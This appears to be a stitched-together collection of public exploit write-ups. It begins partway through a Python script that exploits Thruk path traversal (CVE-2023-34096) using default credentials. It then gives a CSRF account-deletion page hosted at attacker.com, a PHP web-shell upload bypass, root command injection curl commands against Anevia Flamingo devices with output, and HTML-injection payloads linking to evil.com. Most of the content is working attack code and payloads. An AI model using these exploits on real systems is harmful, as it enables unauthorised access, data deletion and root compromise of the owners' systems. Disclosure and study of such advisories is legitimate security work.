print("This version of Thruk is ", end = "")
cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
print("to CVE-2023-34096!")
print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
print(" | Thruk Changelog: https://www.thruk.org/changelog.html")
print(" | Fixed version: 3.06-2+")
print("")
return True
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
return False
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error parsing Thruk's version.\n")
return False
def get_thruk_version():
"""
Function to get Thruk's version via web scraping.
It also verifies the title of the website to check if the target is a Thruk instance.
"""
response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
html_soup = BeautifulSoup(response.text, "html.parser")
if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
sys.exit(-1)
else:
# Extract version anchor tag
version_link = html_soup.find_all("a", {"class": "link text-sm"})
if len(version_link) == 1 and version_link[0].has_attr('href'):
thruk_version = version_link[0].text.strip()
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
return thruk_version
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error retrieving Thruk's version.")
sys.exit(-1)
def get_error_info():
"""
Function to cause an error in the target Thruk instance and collect additional information via web scraping.
"""
# URL that will cause an error
error_url = target + "//cgi-bin/login.cgi"
# Retrieve Any initial Cookies
error_response = requests.get(error_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=10)
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to retrieve additional information...\n")
try:
# Search for the error tag
html_soup = BeautifulSoup(error_response.text, "html.parser")
error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text
if len(error_report) > 0:
# Print Error Info
error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Recovered Information: \n")
parsed_error_report = error_report.split("\n")
for error_line in parsed_error_report:
print(f" {error_line}")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("No additional information available.\n")
def get_thruk_session_auto_login():
"""
Function to login into the Thruk instance and retrieve a valid session.
It will use default Thruk's credentials available here:
- https://www.thruk.org/documentation/install.html
Change credentials if required.
"""
# Default Credentials - Change if required
username = "thrukadmin" # CHANGE ME
password = "thrukadmin" # CHANGE ME
params = {"login": username, "password": password}
cprint("[*] ", "blue", attrs=['bold'], end = "")
print(f"Trying to autenticate with provided credentials: {username}/{password}\n")
# Define Login URL
login_url = "cgi-bin/login.cgi"
session = requests.Session()
# Retrieve Any initial Cookies
session.get(target, headers=headers, allow_redirects=True, verify=False)
# Login and get thruk_auth Cookie
session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)
# Get Cookies as dictionary
cookies = session.cookies.get_dict()
# Successful Login
if cookies.get('thruk_auth') is not None:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Successful Authentication!\n")
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
return session
# Failed Login
else:
if cookies.get('thruk_message') == "fail_message~~login%20failed":
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Login Failed, check your credentials.")
sys.exit(401)
def cve_2023_34096_exploit_path_traversal(logged_session):
"""
Function that attempts to exploit the Path Traversal Vulnerability.
The exploit will try to upload a PoC file to multiple common folders.
This to prevent permissions errors to cause false negatives.
"""
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to exploit: ", end = "")
cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])
# Define Upload URL
upload_url = "cgi-bin/panorama.cgi"
# Absolute paths
common_folders = ["/tmp/",
"/etc/thruk/plugins/plugins-enabled/",
"/etc/thruk/panorama/",
"/etc/thruk/bp/",
"/etc/thruk/thruk_local.d/",
"/var/www/",
"/var/www/html/",
"/etc/",
]
# Upload PoC file to each folder
for target_folder in common_folders:
# PoC file extension is jpg due to regex validations of Thruk.
# Nevertheless this issue can still cause damage in different ways to the affected instance.
files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
data = {"task": "upload",
"type": "image",
"location": f"backgrounds/../../../..{target_folder}"
}
upload_response = logged_session.post(target + upload_url,
data=data,
files=files,
headers=headers,
allow_redirects=False,
verify=False)
try:
upload_response = upload_response.json()
if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
cprint("[-] ", "red", attrs=['bold'], end = "")
print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1] and sys.argv[1].startswith("http"):
target = sys.argv[1]
else:
target = "http://127.0.0.1/thruk/"
# Prepare Base Target URL
if not target.endswith('/'):
target += "/"
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Target URL: {target}\n")
# Get Thruk version via web scraping
scraped_thruk_version = get_thruk_version()
# Send a request that will generate an error and collect extra info
get_error_info()
# Check if the instance is vulnerable to CVE-2023-34096
vulnerable_status = check_vulnerability(scraped_thruk_version)
if vulnerable_status:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")
# Confirm exploitation
option = input("\nChoice (Y/N): ").lower()
print("")
if option == "y":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")
# Login into Thruk instance
valid_session = get_thruk_session_auto_login()
# Exploit Path Traversal Vulnerability
cve_2023_34096_exploit_path_traversal(valid_session)
elif option == "n":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("No exploitation attempts were performed, Goodbye!\n")
sys.exit(0)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Unknown option entered.")
sys.exit(1)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
sys.exit(2)
# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Google Dork: n/a
# Date: 09/06/2023
# Exploit Author: Ramil Mustafayev (kryptohaker)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a
Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.
To exploit this vulnerability, an attacker needs to do the following:
1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:
<html>
<body>
<form action="http://example.com/update.php" method="GET">
<input type="hidden" name="demail" value="victim@example.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
5. Send the URL of the HTML page to the admin user via email, social media, or any other means.
If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187
===============================
STEPS_TO_REPRODUCE
===============================
1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the **Content-type from “ image/png “ to “ image/gif “
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
8. Below is the Burpsuite-POST Request for all the changes that I have made above
==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/trms/teacher/changeimage.php>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"
John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif
GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryndAPYa0GGOxSUHdF--
===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
Hardware revision 1.1, 1.0
SoapLive 2.4.1, 2.0.3
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
13.04.2023
--
> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<
100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k
* Connection #0 to host 192.168.1.1 left intact
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
Hardware revision: 1.1
SoapLive 2.4.0
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.14.29 (x86_64)
Apache/2.2.22 (Debian)
PHP/5.6.0-0anevia2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
13.04.2023
--
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
<td>uid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
<td>gid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
<td>groups=33(www-data),6(disk),25(floppy)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>
---
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
<td>uid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
<td>gid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
<td>groups=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>
Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184
==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123
=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username`
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED .
6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE
==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"
<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"
<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"
<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"
<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"
1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary7hwjNQW3mptDFOwo--
===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md